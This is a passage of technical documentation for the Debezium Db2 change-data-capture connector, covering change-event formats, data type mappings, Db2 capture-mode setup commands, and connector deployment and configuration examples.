\"LAST_NAME\": \"doe\",\n \"EMAIL\": \"john.doe@example.org\"\n },\n \"source\": { \/\/ <8>\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"myconnector\",\n \"ts_ms\": 1559729468470,\n \"snapshot\": false,\n \"db\": \"mydatabase\",\n \"schema\": \"MYSCHEMA\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": \"00000027:00000758:0003\",\n \"commit_lsn\": \"00000027:00000758:0005\",\n },\n \"op\": \"c\", \/\/ <9>\n \"ts_ms\": 1559729471739 \/\/ <10>\n }\n}\n----\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table.\n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`mydatabase.MYSCHEMA.CUSTOMERS.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. The connector uses this schema for all rows in the `MYSCHEMA.CUSTOMERS` table. +\n +\nNames of schemas for `before` and `after` fields are of the form `_logicalName_._schemaName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the {link-prefix}:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\n\n|3\n|`name`\na|`io.debezium.connector.db2.Source` is the schema for the payload's `source` field. This schema is specific to the Db2 connector. The connector uses it for all events that it generates.\n\n|4\n|`name`\na|`mydatabase.MYSCHEMA.CUSTOMERS.Envelope` is the schema for the overall structure of the payload, where `mydatabase` is the database, `MYSCHEMA` is the schema, and `CUSTOMERS` is the table.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that JSON representations of events are much larger than the rows they describe. This is because a JSON representation must include the schema portion and the payload portion of the message.\nHowever, by using the {link-prefix}:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`before`\n|An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content.\n\n|7\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `ID`, `FIRST_NAME`, `LAST_NAME`, and `EMAIL` columns.\n\n|8\n|`source`\na| Mandatory field that describes the source metadata for the event. The `source` structure shows Db2 information about this change, which provides traceability. It also has information you can use to compare to other events in the same topic or in other topics to know whether this event occurred before, after, or as part of the same commit as other events. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Timestamp for when the change was made in the database\n* Whether the event is part of an ongoing snapshot\n* Name of the database, schema, and table that contain the new row\n* Change LSN\n* Commit LSN (omitted if this event is part of a snapshot)\n\n|9\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are:\n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies to only snapshots)\n\n|10\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[[db2-update-events]]\n=== _update_ events\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the _update_ event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"john.doe@example.org\"\n },\n \"after\": { \/\/ <2>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"noreply@example.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"myconnector\",\n \"ts_ms\": 1559729995937,\n \"snapshot\": false,\n \"db\": \"mydatabase\",\n \"schema\": \"MYSCHEMA\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": \"00000027:00000ac0:0002\",\n \"commit_lsn\": \"00000027:00000ac0:0007\",\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1559729998706 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that specifies the state of the row before the event occurred. In an _update_ event value, the `before` field contains a field for each table column and the value that was in that column before the database commit. In this example, note that the `EMAIL` value is `john.doe@example.com`.\n\n|2\n|`after`\n| An optional field that specifies the state of the row after the event occurred. You can compare the `before` and `after` structures to determine what the update to this row was. In the example, the `EMAIL` value is now `noreply@example.com`.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure contains the same fields as in a _create_ event, but some values are different, for example, the sample _update_ event has different LSNs. You can use this information to compare this event to other events to know whether this event occurred before, after, or as part of the same commit as other events. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Timestamp for when the change was made in the database\n* Whether the event is part of an ongoing snapshot\n* Name of the database, schema, and table that contain the new row\n* Change LSN\n* Commit LSN (omitted if this event is part of a snapshot)\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[NOTE]\n====\nUpdating the columns for a row's primary\/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a {link-prefix}:{link-db2-connector}#db2-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row.\n====\n\n[[db2-delete-events]]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The event value `payload` in a _delete_ event for the sample `customers` table looks like this:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"noreply@example.org\"\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"myconnector\",\n \"ts_ms\": 1559730445243,\n \"snapshot\": false,\n \"db\": \"mydatabase\",\n \"schema\": \"MYSCHEMA\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": \"00000027:00000db0:0005\",\n \"commit_lsn\": \"00000027:00000db0:0007\"\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1559730450205 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.\n\n|2\n|`after`\n| Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and LSN field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata:\n\n* {prodname} version\n* Connector type and name\n* Timestamp for when the change was made in the database\n* Whether the event is part of an ongoing snapshot\n* Name of the database, schema, and table that contain the new row\n* Change LSN\n* Commit LSN (omitted if this event is part of a snapshot)\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row. The old values are included because some consumers might require them in order to properly handle the removal.\n\nDb2 connector events are designed to work with link:{link-kafka-docs}\/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n[[db2-tombstone-events]]\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, after {prodname}\u2019s Db2 connector emits a _delete_ event, the connector emits a special tombstone event that has the same key but a `null` value.\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-db2-connectors-map-data-types\n\/\/ Title: How {prodname} Db2 connectors map data types\n[[db2-data-types]]\n== Data type mappings\n\nDb2's data types are described in https:\/\/www.ibm.com\/support\/knowledgecenter\/en\/SSEPGG_11.5.0\/com.ibm.db2.luw.sql.ref.doc\/doc\/r0008483.html[Db2 SQL Data Types].\n\nThe Db2 connector represents changes to rows with events that are structured like the table in which the row exists. The event contains a field for each column value. How that value is represented in the event depends on the Db2 data type of the column. This section describes these mappings.\n\nifdef::product[]\nDetails are in the following sections:\n\n* xref:db2-basic-types[]\n* xref:db2-temporal-types[]\n* xref:db2-timestamp-types[]\n* xref:db2-decimal-types[]\n\nendif::product[]\n\n[id=\"db2-basic-types\"]\n=== Basic types\n\nThe following table describes how the connector maps each of the Db2 data types to a _literal type_ and a _semantic type_ in event fields.\n\n* _literal type_ describes how the value is represented using Kafka Connect schema types: `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`.\n\n* _semantic type_ describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.\n\n.Mappings for Db2 basic data types\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|Db2 data type \n|Literal type (schema type) \n|Semantic type (schema name) and Notes\n\n|`BOOLEAN`\n|`BOOLEAN`\n|Only snapshots can be taken from tables with BOOLEAN type columns. Currently SQL Replication on Db2 does not support BOOLEAN, so Debezium can not perform CDC on those tables. Consider using a different type.\n\n\n|`BIGINT`\n|`INT64`\n|n\/a\n\n|`BINARY`\n|`BYTES`\n|n\/a\n\n|`BLOB`\n|`BYTES`\n|n\/a\n\n|`CHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`CLOB`\n|`STRING`\n|n\/a\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nString representation of a timestamp without timezone information\n\n|`DECFLOAT`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal`\n\n|`DECIMAL`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal`\n\n|`DBCLOB`\n|`STRING`\n|n\/a\n\n|`DOUBLE`\n|`FLOAT64`\n|n\/a\n\n|`INTEGER`\n|`INT32`\n|n\/a\n\n|`REAL`\n|`FLOAT32`\n|n\/a\n\n|`SMALLINT`\n|`INT16`\n|n\/a\n\n|`TIME`\n|`INT32`\n|`io.debezium.time.Time` +\n +\nString representation of a time without timezone information\n\n|`TIMESTAMP`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nString representation of a timestamp without timezone information\n\n|`VARBINARY`\n|`BYTES`\n|n\/a\n\n|`VARCHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`VARGRAPHIC`\n|`STRING`\n|n\/a\n\n|`XML`\n|`STRING`\n|`io.debezium.data.Xml` +\n +\nString representation of an XML document\n|===\n\nIf present, a column's default value is propagated to the corresponding field's Kafka Connect schema. Change events contain the field's default value unless an explicit column value had been given. Consequently, there is rarely a need to obtain the default value from the schema.\nifdef::community[]\nPassing the default value helps satisfy compatibility rules when {link-prefix}:{link-avro-serialization}[using Avro] as the serialization format together with the Confluent schema registry.\nendif::community[]\n\n[[db2-temporal-types]]\n=== Temporal types\n\nOther than Db2's `DATETIMEOFFSET` data type, which contains time zone information, how temporal types are mapped depends on the value of the `time.precision.mode` connector configuration property. The following sections describe these mappings:\n\n* xref:db2-time-precision-mode-adaptive[`time.precision.mode=adaptive`]\n* xref:db2-time-precision-mode-connect[`time.precision.mode=connect`]\n\n[[db2-time-precision-mode-adaptive]]\n.`time.precision.mode=adaptive`\nWhen the `time.precision.mode` configuration property is set to `adaptive`, the default, the connector determines the literal type and semantic type based on the column's data type definition. This ensures that events _exactly_ represent the values in the database.\n\n.Mappings when `time.precision.mode` is `adaptive`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME(0)`, `TIME(1)`, `TIME(2)`, `TIME(3)`\n|`INT32`\n|`io.debezium.time.Time` +\n +\nRepresents the number of milliseconds past midnight, and does not include timezone information.\n\n|`TIME(4)`, `TIME(5)`, `TIME(6)`\n|`INT64`\n|`io.debezium.time.MicroTime` +\n +\nRepresents the number of microseconds past midnight, and does not include timezone information.\n\n|`TIME(7)`\n|`INT64`\n|`io.debezium.time.NanoTime` +\n +\nRepresents the number of nanoseconds past midnight, and does not include timezone information.\n\n|`DATETIME`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`SMALLDATETIME`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2(0)`, `DATETIME2(1)`, `DATETIME2(2)`, `DATETIME2(3)`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2(4)`, `DATETIME2(5)`, `DATETIME2(6)`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nRepresents the number of microseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2(7)`\n|`INT64`\n|`io.debezium.time.NanoTimestamp` +\n +\nRepresents the number of nanoseconds past the epoch, and does not include timezone information.\n|===\n\n[[db2-time-precision-mode-connect]]\n.`time.precision.mode=connect`\nWhen the `time.precision.mode` configuration property is set to `connect`, the connector uses Kafka Connect logical types. This may be useful when consumers can handle only the built-in Kafka Connect logical types and are unable to handle variable-precision time values. However, since Db2 supports tenth of a microsecond precision, the events generated by a connector with the `connect` time precision *results in a loss of precision* when the database column has a _fractional second precision_ value that is greater than 3.\n\n.Mappings when `time.precision.mode` is `connect`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`org.apache.kafka.connect.data.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME([P])`\n|`INT64`\n|`org.apache.kafka.connect.data.Time` +\n +\nRepresents the number of milliseconds since midnight, and does not include timezone information. Db2 allows `P` to be in the range 0-7 to store up to tenth of a microsecond precision, though this mode results in a loss of precision when `P` is greater than 3.\n\n|`DATETIME`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`SMALLDATETIME`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information. Db2 allows `P` to be in the range 0-7 to store up to tenth of a microsecond precision, though this mode results in a loss of precision when `P` is greater than 3.\n|===\n\n[[db2-timestamp-types]]\n=== Timestamp types\n\nThe `DATETIME`, `SMALLDATETIME` and `DATETIME2` types represent a timestamp without time zone information.\nSuch columns are converted into an equivalent Kafka Connect value based on UTC. For example, the `DATETIME2` value \"2018-06-20 15:13:16.945104\" is represented by an `io.debezium.time.MicroTimestamp` with the value \"1529507596945104\".\n\nThe timezone of the JVM running Kafka Connect and {prodname} does not affect this conversion.\n\n[[db2-decimal-types]]\n=== Decimal types\n\n[cols=\"27%a,18%a,55%a\",options=\"header\"]\n|===\n|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes\n\n|`NUMERIC[(P[,S])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n\n|`DECIMAL[(P[,S])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n\n|`SMALLMONEY`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point iss shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n\n|`MONEY`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n|===\n\n\/\/ Type: procedure\n\/\/ ModuleID: setting-up-db2-to-run-a-debezium-connector\n\/\/ Title: Setting up Db2 to run a {prodname} connector\n[[setting-up-db2]]\n== Set up\n\nA database administrator must put tables into capture mode before you can run a {prodname} Db2 connector to capture changes that are committed to a Db2 database. To put tables into capture mode, {prodname} provides a set of user-defined functions (UDFs) for your convenience. The procedure here shows how to install and run these management UDFs. Alternatively, you can run Db2 control commands to put tables into capture mode.\n\nThis procedure assumes that you are logged in as the `db2instl` user, which is the default instance and user name when using the Db2 docker container image.\n\n.Prerequisites\n\n* On the machine on which Db2 is running, the content in `debezium-connector-db2\/src\/test\/docker\/db2-cdc-docker` is available in the `$HOME\/asncdctools\/src` directory.\n\n.Procedure\n\n. Compile the {prodname} management UDFs on the Db2 server host by using the `bldrtn`\ncommand provided with Db2:\n+\n[source,shell]\n----\ncd $HOME\/asncdctools\/src\n----\n+\n[source,shell]\n----\n.\/bldrtn asncdc\n----\n\n. Start the database if it is not already running. Replace `DB_NAME` with the name of the database that you want {prodname} to connect to.\n+\n[source,shell]\n----\ndb2 start db DB_NAME\n----\n\n. Ensure that JDBC can read the Db2 metadata catalog:\n+\n[source,shell]\n----\ncd $HOME\/sqllib\/bnd\n----\n+\n[source,shell]\n----\ndb2 bind db2schema.bnd blocking all grant public sqlerror continue\n----\n\n. Ensure that the database was recently backed-up. The ASN agents must have a recent starting point to read from. If you need to perform a backup, run the following commands, which prune the data so that only the most recent version is available. If you do not need to retain the older versions of the data, specify `dev\/null` for the backup location.\n\n.. Back up the database. Replace `DB_NAME` and `BACK_UP_LOCATION` with appropriate values:\n+\n[source,shell]\n----\ndb2 backup db DB_NAME to BACK_UP_LOCATION\n----\n\n.. Restart the database:\n+\n[source,shell]\n----\ndb2 restart db DB_NAME\n----\n\n. Connect to the database to install the {prodname} management UDFs. It is assumed that you are logged in as the `db2instl` user so the UDFs should be installed on the `db2inst1` user.\n+\n[source,shell]\n----\ndb2 connect to DB_NAME\n----\n\n. Copy the {prodname} management UDFs and set permissions for them:\n+\n[source,shell]\n----\ncp $HOME\/asncdctools\/src\/asncdc $HOME\/sqllib\/function\n----\n+\n[source,shell]\n----\nchmod 777 $HOME\/sqllib\/function\n----\n\n. Enable the {prodname} UDF that starts and stops the ASN capture agent:\n+\n[source,shell]\n----\ndb2 -tvmf $HOME\/asncdctools\/src\/asncdc_UDF.sql\n----\n\n. Create the ASN control tables:\n+\n[source,shell]\n----\n$ db2 -tvmf $HOME\/asncdctools\/src\/asncdctables.sql\n----\n\n. Enable the {prodname} UDF that adds tables to capture mode and removes tables from capture mode:\n+\n[source,shell]\n----\n$ db2 -tvmf $HOME\/asncdctools\/src\/asncdcaddremove.sql\n----\n+\nAfter you set up the Db2 server, use the UDFs to control Db2 replication (ASN) with SQL commands. Some of the UDFs expect a return value in which case you use the SQL `VALUE` statement to invoke them. For other UDFs, use the SQL `CALL` statement.\n\n. Start the ASN agent:\n+\n[source,sql]\n----\nVALUES ASNCDC.ASNCDCSERVICES('start','asncdc');\n----\n\n. Put tables into capture mode. Invoke the following statement for each table that you want to put into capture. Replace `MYSCHEMA` with the name of the schema that contains the table you want to put into capture mode. Likewise, replace `MYTABLE` with the name of the table to put into capture mode:\n+\n[source,sql]\n----\nCALL ASNCDC.ADDTABLE('MYSCHEMA', 'MYTABLE');\n----\n\n. Reinitialize the ASN service:\n+\n[source,sql]\n----\nVALUES ASNCDC.ASNCDCSERVICES('reinit','asncdc');\n----\n\n.Additional resource\n\n{link-prefix}:{link-db2-connector}#managing-debezium-db2-connectors[Reference table for {prodname} Db2 management UDFs]\n\n\/\/ Type: assembly\n\/\/ ModuleID: deploying-debezium-db2-connectors\n\/\/ Title: Deploying {prodname} Db2 connectors\n[[db2-deploying-a-connector]]\n== Deployment\n\nifdef::community[]\n\nWith https:\/\/zookeeper.apache.org[Zookeeper], http:\/\/kafka.apache.org\/[Kafka], and {link-kafka-docs}.html#connect[Kafka Connect] installed, the remaining tasks to deploy a {prodname} Db2 connector are:\n\n. Download the link:https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-db2\/{debezium-version}\/debezium-connector-db2-{debezium-version}-plugin.tar.gz[connector's plug-in archive].\n\n. Extract the JAR files into your Kafka Connect environment.\n. Add the directory with the JAR files to {link-kafka-docs}\/#connectconfigs[Kafka Connect's `plugin.path`].\n. Obtain the link:https:\/\/www.ibm.com\/support\/pages\/db2-jdbc-driver-versions-and-downloads[JDBC driver for Db2].\n. Add the JDBC driver JAR file to the directory with the {prodname} Db2 connector JARs.\n. {link-prefix}:{link-db2-connector}#db2-adding-connector-configuration[Configure the connector and add the configuration to your Kafka Connect cluster.]\n. Restart your Kafka Connect process to pick up the new JAR files.\n\nIf you are working with immutable containers, see link:https:\/\/hub.docker.com\/r\/debezium\/[{prodname}'s Container images] for Zookeeper, Kafka and Kafka Connect with the Db2 connector already installed and ready to run.\nYou can also xref:operations\/openshift.adoc[run {prodname} on Kubernetes and OpenShift].\nendif::community[]\n\nifdef::product[]\nTo deploy a {prodname} Db2 connector, install the {prodname} Db2 connector archive, configure the connector, and start the connector by adding its configuration to Kafka Connect. Details are in the following topics:\n\n* xref:steps-for-installing-debezium-db2-connectors[]\n* xref:debezium-db2-connector-configuration-example[]\n* xref:adding-debezium-db2-connector-configuration-to-kafka-connect[]\n* xref:descriptions-of-debezium-db2-connector-configuration-properties[]\n\n\/\/ Type: concept\n[id=\"steps-for-installing-debezium-db2-connectors\"]\n=== Steps for installing {prodname} Db2 connectors\n\nTo install the Db2 connector, follow the procedures in {LinkDebeziumInstallOpenShift}[{NameDebeziumInstallOpenShift}]. The main steps are:\n\n. {LinkDebeziumUserGuide}#setting-up-db2-to-run-a-debezium-connector[Set up Db2 to run a {prodname} connector]. This enables Db2 replication to expose change-data for tables that are in capture mode.\n\n. Use link:https:\/\/access.redhat.com\/products\/red-hat-amq#streams[Red Hat AMQ Streams] to set up Apache Kafka and Kafka Connect on OpenShift. AMQ Streams offers operators and images that bring Kafka to OpenShift.\n\n. Download the {prodname} link:https:\/\/access.redhat.com\/jbossnetwork\/restricted\/listSoftware.html?product=red.hat.integration&downloadType=distributions[Db2 connector].\n\n. Extract the files into your Kafka Connect environment.\n. Add the plug-in's parent directory to your Kafka Connect `plugin.path`, for example:\n+\n[source]\n----\nplugin.path=\/kafka\/connect\n----\n+\nThe above example assumes that you extracted the {prodname} Db2 connector to the `\/kafka\/connect\/{prodname}-connector-db2` path.\n\n. Restart your Kafka Connect process to ensure that the new JAR files are picked up.\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-db2-connector-configuration-example\n\/\/ Title: {prodname} Db2 connector configuration example\n[[db2-example-configuration]]\n=== Connector configuration example\n\nifdef::community[]\n\n[[db2-example]]\n\nFollowing is an example of the configuration for a Db2 connector that connects to a Db2 server on port 50000 at 192.168.99.100, whose logical name is `fullfillment`. Typically, you configure the {prodname} Db2 connector in a `.json` file using the configuration properties available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables. Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[source,json]\n----\n{\n \"name\": \"db2-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.db2.Db2Connector\", \/\/ <2>\n \"database.hostname\": \"192.168.99.100\", \/\/ <3>\n \"database.port\": \"50000\", \/\/ <4>\n \"database.user\": \"db2inst1\", \/\/ <5>\n \"database.password\": \"Password!\", \/\/ <6>\n \"database.dbname\": \"mydatabase\", \/\/ <7>\n \"database.server.name\": \"fullfillment\", \/\/ <8>\n \"table.include.list\": \"MYSCHEMA.CUSTOMERS\", \/\/ <9>\n \"database.history.kafka.bootstrap.servers\": \"kafka:9092\", \/\/ <10>\n \"database.history.kafka.topic\": \"dbhistory.fullfillment\" \/\/ <11>\n }\n}\n----\n<1> The name of the connector when registered with a Kafka Connect service.\n<2> The name of this Db2 connector class.\n<3> The address of the Db2 instance.\n<4> The port number of the Db2 instance.\n<5> The name of the Db2 user.\n<6> The password for the Db2 user.\n<7> The name of the database to capture changes from.\n<8> The logical name of the Db2 instance\/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the {link-prefix}:{link-avro-serialization}[Avro Connector] is used.\n<9> A list of all tables whose changes {prodname} should capture.\n<10> The list of Kafka brokers that this connector uses to write and recover DDL statements to the database history topic.\n<11> The name of the database history topic where the connector writes and recovers DDL statements. This topic is for internal use only and should not be used by consumers.\n\nendif::community[]\n\nifdef::product[]\n\nFollowing is an example of the configuration for a Db2 connector that connects to a Db2 server on port 50000 at 192.168.99.100, whose logical name is `fullfillment`. Typically, you configure a {prodname} Db2 connector in a `.yaml` file using the configuration properties available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables. Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[source,yaml,options=\"nowrap\",subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\n kind: KafkaConnector\n metadata:\n name: inventory-connector \/\/ <1>\n labels: strimzi.io\/cluster: my-connect-cluster\n spec:\n class: io.debezium.connector.db2.Db2Connector\n tasksMax: 1 \/\/ <2>\n config: \/\/ <3>\n database.hostname: 192.168.99.100 \/\/ <4>\n database.port: 50000\n database.user: db2inst1\n database.password: Password!\n database.dbname: mydatabase\n database.server.name: fullfillment \/\/ <5>\n database.include.list: public.inventory \/\/ <6>\n----\n\n.Descriptions of connector configuration settings\n[cols=\"1,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Item |Description\n\n|1\n|The name of the connector.\n\n|2\n|Only one task should operate at any one time.\n\n|3\n|The connector\u2019s configuration.\n\n|4\n|The database host, which is the address of the Db2 instance. \n\n|5\n|The logical name of the Db2 instance\/cluster, which forms a namespace and is used in the names of the Kafka topics to which the connector writes, the names of Kafka Connect schemas, and the namespaces of the corresponding Avro schema when the {link-prefix}:{link-avro-serialization}[Avro Connector] is used.\n\n|6\n|Changes in only the `public.inventory` database are captured.\n\n|===\n\nendif::product[]\n\nSee the {link-prefix}:{link-db2-connector}#db2-connector-properties[complete list of connector properties] that you can specify in these configurations.\n\nYou can send this configuration with a `POST` command to a running Kafka Connect service. The service records the configuration and starts one connector task that connects to the Db2 database, reads change-data tables for tables in capture mode, and streams change event records to Kafka topics.\n\n\/\/ Type: procedure\n\/\/ ModuleID: adding-debezium-db2-connector-configuration-to-kafka-connect\n\/\/ Title: Adding {prodname} Db2 connector configuration to Kafka Connect\n[[db2-adding-connector-configuration]]\n=== Adding connector configuration\n\nifdef::community[]\nTo start running a Db2 connector, create a connector configuration and add the configuration to your Kafka Connect cluster. \n\n.Prerequisites\n\n* The {link-prefix}:{link-db2-connector}#setting-up-db2-to-run-a-debezium-connector[Db2 replication] is enabled to expose change-data for tables that are in capture mode\n\n* The Db2 connector is installed.\n\n.Procedure\n\n. Create a configuration for the Db2 connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.\n\nendif::community[]\n\nifdef::product[]\nYou can use a provided {prodname} container to deploy a {prodname} Db2 connector. In this procedure, you build a custom Kafka Connect container image for {prodname}, configure the {prodname} connector as needed, and then add your connector configuration to your Kafka Connect environment.\n\n.Prerequisites\n\n* Podman or Docker is installed and you have sufficient rights to create and manage containers.\n* You installed the {prodname} Db2 connector archive. \n\n.Procedure\n\n. Extract the {prodname} Db2 connector archive to create a directory structure for the connector plug-in, for example:\n+\n[subs=+macros]\n----\npass:quotes[*tree .\/my-plugins\/*]\n.\/my-plugins\/\n\u251c\u2500\u2500 debezium-connector-db2\n\u2502 \u251c\u2500\u2500 ...\n----\n\n. Create and publish a custom image for running your {prodname} connector:\n\n.. Create a new `Dockerfile` by using `{DockerKafkaConnect}` as the base image. In the following example, 